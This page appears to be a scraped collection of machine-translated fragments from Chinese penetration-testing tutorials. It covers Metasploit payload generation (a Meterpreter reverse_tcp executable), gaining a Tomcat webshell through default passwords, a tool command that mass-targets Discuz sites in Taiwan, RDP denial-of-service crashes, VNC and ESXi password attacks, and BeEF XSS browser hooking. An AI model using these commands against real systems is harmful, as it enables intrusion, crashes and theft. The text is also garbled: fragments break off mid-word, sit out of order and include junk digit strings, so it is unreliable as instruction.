Package Attack payloadMsfpayload:Usage:Msfpayload [Summary:summary and Optons of payloadC:c languagePerl:perlRuby:rubyRaw:raw,allows payload to being piped into msfencode and other toolsJs:javascriptExe:windows ExecutableDll:dllVba:vbaWar:war PackageExampleMsfpayload-l | grep Windows | grep reverse_tcp | grep MeterpreterMsfpayload windows/meterpreter/reverse_tcp o:show Optionsmsfpayload [payload] X >xx.exeAttack Load CodeMsfencode:Usage:Msfencode OPTIONS:-A -B -C -D -e -H Help banner: helpful ti
Use the Tomcat console default password vulnerability, upload Trojan file, get target host Webshell.When the Tomcat console is installed, you need to modify the default management account in a timely manner and eliminate the weak password, and successful users can deploy any Web application, including Webshell.First, using the Nmap tool to scan the target hostThe 1.1 uses the Nmap command to scan the target host. Click on the left side of the desktop
Linux under:
Enter MSFDsudo msfd
Open connectionMsfd-a
To see if the port is openNetstat-tn
Remote Connectivity MSF
NC
Under Windows:
Open connectionmsf> load MSFD servername= Your IP address serverport= your port
View ConnectionNetstat-na
Access using TelnetTelnet
Window may appear garbled, here is recommended to use an open source software putty, with a simple instructions:
Here, choose Telnet, and then fill in the IP and port (hint:
information
L Specify query statement attack
Parse the submitted query statement, find the list of qualified domain names from es, and then load all the attack scripts of a module to attack.
Python safecatcli.py-c [your class name]-Q "[Your query string]"
For example: Attacking Taiwan's discuz host
Python safecatcli.py-c discuz-q "Discuz Country:taiwan"
L Specify a domain name attack
That is, a committed domain is attacked, loading all scripts from the module to attack.
Python safecatcli.py-c
Options:-P, -- payload [payload] Payload to use. Specify a '-' or stdin to use M payloads-L, -- list [module_type] List a module type example: payloads, encoders, nops, all-N, -- nopsled [length] Prepend a nopsled of [length] size on to the payload-F, -- format [format] Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war-
To reconfigure Kali Linux as a platform, in addition to updating the system yesterday, some additional configurations are required, such as configuring Grub in dual systems. You need to reconfigure Grub because after Kali is installed on the same hard disk of Windows, the default Grub startup Item is Kali, and the default time is 5 seconds, as a real machine, it often enters Kali in response.Generally, the Grub configuration files are all configured to open the menu with the root permission unde
vulnerabilities found exist and that they can be exploited.3. Security loopholes and penetration code in the closed team circulated , found security loopholes and give penetration code, white hat notify manufacturers to repair, after the manufacturers repair and then publish. Black hats and grey hats are generally shared secretly in small, closed teams to exploit the attack value of these security holes and penetration code.4. Security vulnerabilities and penetration codes began to spread , and
VNC password hackVNC Port 5900Open the database FirstStart MSFVNC Access without passwordRDP Remote Desktop VulnerabilityWin7 192.168.1.123XP 192.168.1.122Found two modules, one is DOS module, one is scanner moduleUsing the DOS denial of service attack moduleSet the destination IP to XPRun, XP on the blue screenSet the target service to Win7Run,Win7 's blue screen too.VMWare ESXi Password BlastingSpecifying a password dictionaryIf the result is exploded, use
Meterpreter > Help Core Commands ============= Command Description------- -----------
? Help menu background Backgrounds The current session Bgkill kills a background m Eterpreter script bglist Lists running background scripts Bgrun executes a Meterpreter script as a background thread channel displays information about active channels CLO SE closes a channel disable_unicode_encoding disables encoding of Unicode strings Enable_unic Ode_encoding enables encoding of Unic
; Db_connect postgres:[email protected]/postgres[*] Rebuilding the module cache in the BACKGROUND...MSF > Db_nma P[*] usage:db_nmap [nmap options]
After successfully linking to the database, you can use the Db_nmap command, which runs Nmap in the MSF terminal and automatically stores the NMAP results in the database.
123456789101112131415161718192021222324252627282930313233343536373839404142434445464
instanceDb_del_host removing one or more hosts from a databaseDb_del_port removing a port from the databaseDb_destroy Deleting an existing databaseDb_disconnect disconnecting from the current DB instanceDb_driver Specifying a database driverDb_hosts list all hosts in the databaseDb_nmap execute nmap and record outputDb_notes List all comments in the databaseDb_services list all services in a databaseDb_vulns list all vulnerabilities in the databaseDb_workspace Converting a Database workspaceDb_
Tags: local stat host NIS tar TCP policy Create promotionMSF > Load Nessus MSF > Nessus_connect fuckyou:[email Protected] Connect on Nessus MSF > Nessus_user_add Elevate the test user to admin[Email protected]:# nessus-adminLogin:xxxoooYest is isn't an administrative user. Does want to grant him admin rights? [y/n] YTest is now an administrator MSF > nessus_user_list View the list of usersMSF > nessus_policy_list Select a scan rule ID Name Comments— —- ——–-1 Prepare for PCI-DSS audits (Section
Intranet penetration 1: Use the Xss vulnerability to access the Intranet
0x01: Popular Science
Beef is currently The most popular WEB Framework attack platform in Europe and America. Its full name is: The Browser Exploitation Framework Project. beef uses a simple XSS vulnerability to write JavaScript (hook. js) controls the browser of the target host, obtains detailed information about the host through the browser of the target host, and further scans
(1) Install the Python msgpack class library, The data serialization standard in the MSF official documentation is reference msgpack. [Email protected]:~# apt-get Install Python-setuptools[Email protected]:~# easy_install Msgpack-python(2) create
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.